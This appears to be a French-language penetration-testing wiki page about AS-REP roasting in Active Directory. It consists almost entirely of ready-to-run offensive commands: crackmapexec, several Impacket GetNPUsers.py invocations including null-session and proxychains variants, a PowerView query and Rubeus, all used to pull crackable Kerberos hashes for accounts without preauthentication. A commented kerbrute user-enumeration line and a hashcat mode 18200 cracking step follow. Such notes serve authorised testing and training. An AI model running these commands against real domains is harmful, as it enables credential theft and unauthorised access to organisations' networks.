Skip to content

ASREPRoasting

Nécessite une authentification LDAP valide

Obtention de la liste des utilisateurs n'ayant pas besoin de préauthentifaction.

Après obtention de cette liste, on pourra tenter de casser les mots de passe des utilisateurs.

A distance

crackmapexec ldap  $TARGET -u "$AD_USER" -p "$AD_PASSWORD" --asreproast asrep.txt

# NULL SESSION
GetNPUsers.py "$DOMAIN/" -dc-ip $TARGET -request -outputfile ASREProastables.txt


# Sans authentification
GetNPUsers.py -usersfile users-valid.txt -dc-ip $TARGET -dc-host $DC_HOST $DOMAIN/ -outputfile asreproastable.txt -format hashcat

proxychains -q GetNPUsers.py -hashes "$PASSWORD" -dc-ip "$DC" "$DOMAIN/$USER" -debug

# Powerview
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat /domain:<domain>

# A VERIFIER NE SEMBLE RIN AVOIR 0 FAIRE ICI
# kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 

Cassage du mot de passe avec hashcat : mode 18200

[[docs/_Techniques/Mots de passe/Casser un mot de passe/Hashcat]]